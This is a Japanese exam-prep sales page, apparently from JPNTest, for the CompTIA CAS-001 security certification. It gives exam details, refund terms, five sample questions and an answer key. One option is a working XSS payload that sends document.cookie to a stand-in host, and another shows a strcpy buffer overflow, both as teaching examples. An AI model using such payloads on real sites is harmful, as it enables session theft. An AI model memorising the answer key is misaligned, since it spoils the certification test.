試験内容はベンダーの方針変更とともに更新されるため、教材の鮮度が学習効果を左右します。JPNTestのCAS-001問題集は購入後365日間無料で更新され、2026年時点のCompTIA Advanced Security Practitionerの出題内容にも対応しています。
CompTIA CAS-001 試験概要:
| 認定ベンダー: | CompTIA |
|---|---|
| 試験名: | CompTIA Advanced Security Practitioner |
| 試験番号: | CAS-001 |
| 受験料: | USD 426(過去の参考価格であり、国や時期によって異なる場合があります) |
| 合格点: | 合否判定(CompTIAはCAS-001の段階的な合格スコアを公表していません) |
| 試験時間: | 165 分 |
| 出題数: | 最大80問 |
| 認定の有効期間: | 3年間(CompTIA継続教育プログラムに基づく) |
| 関連資格: | CompTIA Advanced Security Practitioner (CASP) |
| 対応言語: | 英語 |
| 試験形式: | 選択式, パフォーマンスベーステスト(実技試験) |
| サンプル問題: | CompTIA CAS-001 サンプル問題 |
| 受験方法: | 認定されたPearson VUEテストセンターで実施されるコンピュータベースの試験(過去には、提供されている地域で認定オンラインプロクター経由でも受験可能でした)。 |
| 前提条件: | 正式な前提条件はありません。CompTIAは、少なくとも5年間の実務的な技術セキュリティ経験を含む、約10年間のIT管理経験を推奨しています。 |
| 公式シラバスのURL: | https://www.comptia.org/en/certifications/securityx/ |
CompTIA CAS-001 試験シラバストピック:
| セクション | 比重 | 目標 |
|---|---|---|
| リスクマネジメント、ポリシー、および法務 | 20% | - リスクマネジメント
|
| コンピューティング、通信、ビジネス分野の統合 | 30% | - セキュリティソリューションの統合
|
| エンタープライズセキュリティ | 30% | - エンタープライズセキュリティアーキテクチャ
|
| リサーチと分析 | 20% | - セキュリティ分析
|
CAS-001試験のFAQ
「CAS-001」は、CompTIAが実施する「CompTIA Advanced Security Practitioner」の試験コードです。この試験に合格すると、「CompTIA Advanced Security Practitioner」の認定を取得できます。認定レベルはプロフェッショナルに位置づけられています。関連する認定としては、CompTIA Advanced Security Practitioner (CASP)などが挙げられます。JPNTestでは、CAS-001試験対策として495の練習問題をご用意しています。
CAS-001試験の出題数は最大80問、制限時間は165 分です。限られた時間内で全問に取り組む必要があるため、1問にかけられる時間を常に意識し、難しい問題に長く留まりすぎないペース配分が求められます。本番で時間不足に慌てないよう、JPNTestのテストエンジンで制限時間つきの模擬試験に挑戦し、時間配分の感覚を体に覚えさせておくことをおすすめします。
CAS-001試験の合格ラインは合否判定(CompTIAはCAS-001の段階的な合格スコアを公表していません)、受験料はUSD 426(過去の参考価格であり、国や時期によって異なる場合があります)です。万が一不合格だった場合、再受験には改めて全額の受験料が必要になるため、費用面の負担も無視できません。受験前にJPNTestの495の練習問題で模擬試験に取り組み、安定して合格ラインを超えられることを確認してから本番に臨むと安心です。
正式な前提条件はありません。CompTIAは、少なくとも5年間の実務的な技術セキュリティ経験を含む、約10年間のIT管理経験を推奨しています。
受験条件は変更される場合があります。最新かつ正確な情報は、CompTIAの公式ページで必ずご確認ください。
はい、ご購入前にJPNTestのCAS-001問題集の無料サンプル(PDFデモ)をダウンロードして、問題の品質や形式をご確認いただけます。ご購入後は365日間の無料更新が付帯し、更新期間の終了後も50%割引で継続更新をご利用いただけるため、常に最新の出題傾向に沿った内容で学習を続けられます。
JPNTestでは「返金保証」制度をご用意しています。ご購入後60日以内にCAS-001試験を受験して不合格となった場合、全額返金をご申請いただけます。なお、ご購入後3日以内の受験や、ダウンロード後に実際の受験をしていない場合、無料資料や期限切れのご注文は対象外となり、受験者氏名とお支払い者氏名が一致している必要があります。ご申請の際は、受験票(enrollment slip)の写しと公式スコアレポート(Score Report)のPDFを試験後2日以内にご提出いただき、受理後7日以内に手続きが完了します。返金をご希望でない場合は、同等価値の試験資料2点を無料でお受け取りいただき、元の製品の更新サービスを継続する選択肢もございます。
また、ご購入いただいた製品はお支払い完了後すぐにダウンロードでき、メールでも1分以内にお届けします。2時間以内に届かない場合はカスタマーサポートまでご連絡ください。インストール可能なパソコンの台数に制限はありません。
CAS-001試験の出題範囲は、全部で4分野で構成されています。主な分野としては、「コンピューティング、通信、ビジネス分野の統合」(30%)、「リサーチと分析」(20%)、「エンタープライズセキュリティ」(30%)などが挙げられます。各分野の詳細なトピックと配点は、上記の試験大綱をご確認ください。JPNTestのCAS-001練習問題は、これらの出題分野を幅広くカバーしています。
CompTIA Advanced Security Practitioner 認定 CAS-001 試験問題:
問題 #1
Which of the following displays an example of a XSS attack?
A. <form action="/cgi-bin/login" method=post> Username: <input type=text name=username> PassworD.<input type=password name=password> <input type=submit value=Login>
B. #include
char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes
void main()
{char buf[8];
strcpy(buf, code);
}
C. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
D. <SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT>
問題 #2
After connecting to a secure payment server at https://pay.xyz.com, an auditor notices that the SSL certificate was issued to *.xyz.com. The auditor also notices that many of the internal development servers use the same certificate. After installing the certificate on dev1.xyz.com, one of the developers reports misplacing the USB thumb-drive where the SSL certificate was stored. Which of the following should the auditor recommend FIRST?
A. Replace the SSL certificate on dev1.xyz.com.
B. Replace the SSL certificate on pay.xyz.com.
C. Generate a new public key on both servers.
D. Generate a new private key password for both servers.
問題 #3
The company is considering issuing non-standard tablet computers to executive management. Which of the following is the FIRST step the security manager should perform?
A. Set up an access control system to isolate the devices from the network.
B. Apply standard security policy settings to the devices.
C. Develop the use case for the devices and perform a risk analysis.
D. Integrate the tablets into standard remote access systems.
問題 #4
The lead systems architect on a software development project developed a design which is optimized for a distributed computing environment. The security architect assigned to the project has concerns about the integrity of the system, if it is deployed in a commercial cloud. Due topoor communication within the team, the security risks of the proposed design are not being given any attention. A network engineer on the project has a security background and is concerned about the overall success of the project. Which of the following is the BEST course of action for the network engineer to take?
A. Develop a proposal for an alternative architecture that does not leverage cloud computing and present it to the lead architect.
B. Document mitigations to the security concerns and facilitate a meeting between the architects and the project manager.
C. Address the security concerns through the network design and security controls.
D. Implement mitigations to the security risks and address the poor communications on the team with the project manager.
問題 #5
A health service provider is considering the impact of allowing doctors and nurses access to the internal email system from their personal smartphones. The Information Security Officer (ISO) has received a technical document from the security administrator explaining that the current email system is capable of enforcing security policies to personal smartphones, including screen lockout and mandatory PINs. Additionally, the system is able to remotely wipe a phone if reported lost or stolen. Which of the following should the Information Security Officer be MOST concerned with based on this scenario? (Select THREE).
A. Not all smartphones natively support encryption.
B. Compliance may not be supported by all smartphones.
C. Smartphone radios can interfere with health equipment.
D. The email system may become unavailable due to overload.
E. Data usage cost could significantly increase.
F. Smartphones may be used as rogue access points.
G. Equipment loss, theft, and data leakage.
解説:
| 問題 #1 正解: D | 問題 #2 正解: B | 問題 #3 正解: C | 問題 #4 正解: B | 問題 #5 正解: A、B、G |
439 お客様のコメント



